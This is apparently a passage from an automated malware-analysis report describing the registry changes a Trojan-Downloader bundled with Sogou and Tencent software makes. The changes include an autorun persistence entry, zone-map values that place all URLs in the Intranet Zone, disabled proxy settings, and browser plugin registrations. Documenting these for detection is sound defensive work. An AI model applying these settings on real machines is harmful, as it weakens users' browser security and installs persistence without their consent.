"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SogouSoftware]
"UninstallString" = "%Program Files%\SogouSoftware\uninst.exe"

[HKCR\CLSID\{D4D786E8-0535-41DB-91F8-B18ABBCCDE6C}\LocalServer32]
"(Default)" = "%Program Files%\SogouSoftware\SogouSoftware.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SogouSoftware]
"Publisher" = "Sogou.com"

[HKLM\SOFTWARE\SogouSoftware]
"InstallPath" = "%Program Files%\SogouSoftware"
"HWID" = "18 22 90 F2 32 6C B2 22 D4 F1 3E 5E D2 55 65 ED"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\SogouSoftware]
"ProgrameModulesDir" = "%Program Files%\SogouSoftware\3.1.13.79"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SogouSoftware]
"DisplayVersion" = "3.1.13.79"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\SogouSoftware]
"LaunchAppPath" = "%Program Files%\SogouSoftware\SogouSoftware.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKU\S-1-5-20\Software\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C F5 AF 6F D3 D1 7C 59 16 EE BF BC 88 AA 2B D4"

[HKLM\SOFTWARE\SogouSoftware]
"Version" = "3.1.13.79"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D4D786E8-0535-41DB-91F8-B18ABBCCDE6C}]
"AppName" = ""
"Policy" = "3"

[HKU\S-1-5-20_CLASSES\SOFTWARE\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SogouSoftware]
"DisplayName" = "Èí¼þÖúÊÖ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\Software\SogouSoftware\Download]
"DownloadPath" = "C:\SogouDownload"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SogouSoftware" = "%Program Files%\SogouSoftware\SogouSoftware.exe /AutoRun"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process QBDownload.exe:2504 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\12au8967c\QBInstaller.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\12au8967c, , \??\%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\j3lx7ew39.exe,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 AB 12 F5 FF 96 C7 C6 86 90 81 7E FA 1B 35 6B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:2300 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}\TypeLib]
"(Default)" = "{5FD70451-714E-495A-9F17-450AEF3AA35E}"

[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Tencent\QQBrowser\IE8\MIME\Database\Content Type\image/webp\bits]
"0" = "04 00 00 00 FF FF FF FF 52 49 46 46"

[HKCR\TypeLib\{5FD70451-714E-495A-9F17-450AEF3AA35E}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\webp"

[HKCR\WEBPFilter.CoWEBPFilter]
"(Default)" = "WEBPFilter CoWEBPFilter"

[HKCR\WEBPFilter.CoWEBPFilter\CurVer]
"(Default)" = "WEBPFilter CoWEBPFilter.1"

[HKCR\WEBPFilter.CoWEBPFilter.1\CLSID]
"(Default)" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"

[HKCU\Software\Tencent\QQBrowser\IE8\MIME\Database\Content Type\image/webp]
"Image Filter CLSID" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"

[HKCR\MIME\Database\Content Type\image/webp]
"CLSID" = "{25336920-03F9-11cf-8FD0-00AA00686F13}"

[HKCR\AppID\WebpDecodeFilter.DLL]
"AppID" = "{A629F59C-66C9-4775-901A-A017530E3958}"

[HKCR\.webp]
"Content Type" = "image/webp"

[HKCR\WebpDecodeFilter.WebpImageDecodeFilt.1\CLSID]
"(Default)" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\ProgID]
"(Default)" = "WEBPFilter.CoWEBPFilter.1"

[HKCR\WEBPFilter.CoWEBPFilter.1]
"(Default)" = "WEBPFilter CoWEBPFilter"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}]
"(Default)" = "WEBPFilter.CoWEBPFilter"

[HKCR\MIME\Database\Content Type\image/webp]
"Image Filter CLSID" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"

[HKCR\WebpDecodeFilter.WebpImageDecodeFilt.1]
"(Default)" = "WebpImageDecodeFilter Class"

[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}]
"(Default)" = "IWebpImageDecodeFilter"

[HKCR\WebpDecodeFilter.WebpImageDecodeFilter]
"(Default)" = "WebpImageDecodeFilter Class"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\VersionIndependentProgID]
"(Default)" = "WEBPFilter.CoWEBPFilter"

[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}]
"AppID" = "{A629F59C-66C9-4775-901A-A017530E3958}"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\TypeLib]
"(Default)" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"

[HKCR\.webp]
"PerceivedType" = "image"

[HKCR\MIME\Database\Content Type\image/webp\bits]
"0" = "04 00 00 00 FF FF FF FF 52 49 46 46"

[HKCR\TypeLib\{5FD70451-714E-495A-9F17-450AEF3AA35E}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E DC 08 B9 FB 1A 6C 76 B7 30 9D 7C 45 CC 2A 46"

[HKCU\Software\Tencent\QQBrowser\IE8\MIME\Database\Content Type\image/webp]
"CLSID" = "{25336920-03F9-11cf-8FD0-00AA00686F13}"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\webp\WebpDecodeFilter.dll"

[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}\TypeLib]
"Version" = "1.0"

[HKCR\AppID\{A629F59C-66C9-4775-901A-A017530E3958}]
"(Default)" = "WebpDecodeFilter"

[HKCR\WEBPFilter.CoWEBPFilter\CLSID]
"(Default)" = "{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}"

[HKCR\WebpDecodeFilter.WebpImageDecodeFilter\CLSID]
"(Default)" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"

[HKCR\WebpDecodeFilter.WebpImageDecodeFilter\CurVer]
"(Default)" = "WebpDecodeFilter.WebpImageDecodeFilt.1"

[HKCR\TypeLib\{5FD70451-714E-495A-9F17-450AEF3AA35E}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\webp\WebpDecodeFilter.dll"

[HKCU\Software\Tencent\QQBrowser\IE8\MIME\Database\Content Type\image/webp]
"Extension" = ".webp"

[HKCR\MIME\Database\Content Type\image/webp]
"Extension" = ".webp"

[HKCR\TypeLib\{5FD70451-714E-495A-9F17-450AEF3AA35E}\1.0]
"(Default)" = "webpdecodefilter 1.0 Type Library"

The Trojan-Downloader deletes the following registry key(s):

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\TypeLib]
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}]
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\InprocServer32]
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\VersionIndependentProgID]
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\ProgID]

The process regsvr32.exe:808 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCR\Interface\{6D89601E-1736-40FB-A3A5-84A376F286D0}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{13D91BAE-B37C-41C3-AE86-463E53990546}\1.0\HELPDIR]
"(Default)" = "%Program Files%\SogouSoftware\3.1.13.79"

[HKCR\Interface\{6D89601E-1736-40FB-A3A5-84A376F286D0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{6D89601E-1736-40FB-A3A5-84A376F286D0}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{64608416-BAFE-43A2-91C4-324C6CA4EF52}]
"(Default)" = "IGameDownload"

[HKCR\Interface\{64608416-BAFE-43A2-91C4-324C6CA4EF52}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\MozillaPlugins\@sogou.com/SGDownloadPlugin]
"Descripton" = "搜狗高速下载控件"

[HKCR\Interface\{6D89601E-1736-40FB-A3A5-84A376F286D0}\TypeLib]
"(Default)" = "{13D91BAE-B37C-41C3-AE86-463E53990546}"

[HKCR\Interface\{64608416-BAFE-43A2-91C4-324C6CA4EF52}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\MozillaPlugins\@sogou.com/SGDownloadPlugin]
"Path" = "%Program Files%\SogouSoftware\3.1.13.79\npdownload.dll"

[HKCR\CLSID\{D1871D0A-4929-4A3C-AAE5-684235E62244}\TypeLib]
"(Default)" = "{13D91BAE-B37C-41C3-AE86-463E53990546}"

[HKCR\CLSID\{D1871D0A-4929-4A3C-AAE5-684235E62244}]
"(Default)" = "DownLoadBHO Class"

[HKCR\CLSID\{D1871D0A-4929-4A3C-AAE5-684235E62244}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\MozillaPlugins\@sogou.com/SGDownloadPlugin]
"ProductName" = "搜狗高速下载助手"

[HKLM\SOFTWARE\Policies\Google\Chrome\EnabledPlugins]
"1" = "搜狗高速下载助手"

[HKCR\Interface\{6D89601E-1736-40FB-A3A5-84A376F286D0}]
"(Default)" = "IDownLoadBHO"

[HKCR\Interface\{64608416-BAFE-43A2-91C4-324C6CA4EF52}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{64608416-BAFE-43A2-91C4-324C6CA4EF52}\TypeLib]
"(Default)" = "{13D91BAE-B37C-41C3-AE86-463E53990546}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 55 7B 66 E4 AF 14 82 F6 0E 54 49 CE 45 A6 FF"

[HKLM\SOFTWARE\MozillaPlugins\@sogou.com/SGDownloadPlugin]
"Version" = "3.1.13.79"

[HKCR\TypeLib\{13D91BAE-B37C-41C3-AE86-463E53990546}\1.0]
"(Default)" = "SogouDownLoadLib"

[HKCR\TypeLib\{13D91BAE-B37C-41C3-AE86-463E53990546}\1.0\0\win32]
"(Default)" = "%Program Files%\SogouSoftware\3.1.13.79\npdownload.dll"

[HKLM\SOFTWARE\MozillaPlugins\@sogou.com/SGDownloadPlugin]
"vendor" = "Sogou.com Inc."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine\SOFTWARE\Policies\Google\Chrome\EnabledPlugins]
"1" = "搜狗高速下载助手"

[HKCR\TypeLib\{13D91BAE-B37C-41C3-AE86-463E53990546}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{D1871D0A-4929-4A3C-AAE5-684235E62244}\Version]
"(Default)" = "1.0"

[HKCR\CLSID\{D1871D0A-4929-4A3C-AAE5-684235E62244}\InprocServer32]
"(Default)" = "%Program Files%\SogouSoftware\3.1.13.79\npdownload.dll"

The Trojan-Downloader deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine\SOFTWARE\Policies\Google\Chrome\EnabledPlugins]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine\SOFTWARE\Policies]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine\SOFTWARE\Policies\Google\Chrome]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine\SOFTWARE]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}User]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine\SOFTWARE\Policies\Google]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine]

The process regsvr32.exe:3168 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 05 E1 6D EA E7 4E 49 E7 9A 54 DC ED 37 27 C0"

[HKCR\qmgcfiles\ShellEx\IconHandler]
"(Default)" = "{B7667919-3765-4815-A66D-98A09BE662D6}"

[HKCR\.qmgc]
"(Default)" = "qmgcfiles"

[HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shellex\ContextMenuHandlers\QRec]
"(Default)" = "{B7667919-3765-4815-A66D-98A09BE662D6}"

[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\InprocServer32]
"(Default)" = "%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGCShellExt.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\.QMDeskTopGCIcon]
"(Default)" = "{B7667919-3765-4815-A66D-98A09BE662D6}"

[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\ProgID]
"(Default)" = "QQPCMgr.GarbageCleaner.1"

[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}]
"AppID" = ""
"(Default)" = "PCMgr Garbage Cleaner ShellExtension"

[HKCR\qmgcfiles\DefaultIcon]
"(Default)" = "%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGCShellExt.dll,1"

[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\VersionIndependentProgID]
"(Default)" = "QQPCMgr.GarbageCleaner"

[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\InprocServer32]
"ThreadingModel" = "Apartment"

The Trojan-Downloader deletes the following registry key(s):

[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\InprocServer32]
[HKCR\qmgcfiles\ShellEx\IconHandler]
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\VersionIndependentProgID]
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}]
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\Programmable]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\.QMDeskTopGCIcon]
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\ProgID]

The process TsService.exe:3568 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE 3E 6F 3B 0D 64 8D A9 26 31 06 F0 E2 89 3B 6F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process TsService.exe:3448 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 9A CB CC 51 D7 F5 F3 18 8A 09 E1 DA BE 0D 2A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Tencent\QQBrowser]
"QBServiceExeName" = "TsService.exe"
"InstallTime" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Tencent\QQBrowser]
"QBServiceName" = "TxQBService"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

The process cacls.exe:3344 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 95 82 AC 23 7D 4E 7E F9 5A 7E 51 F2 C8 34 E0"

The process UpdateService.exe:628 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 B4 4D E2 74 AA A7 37 F7 90 F1 37 6D 6B 5F 21"

The process UpdateService.exe:1880 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
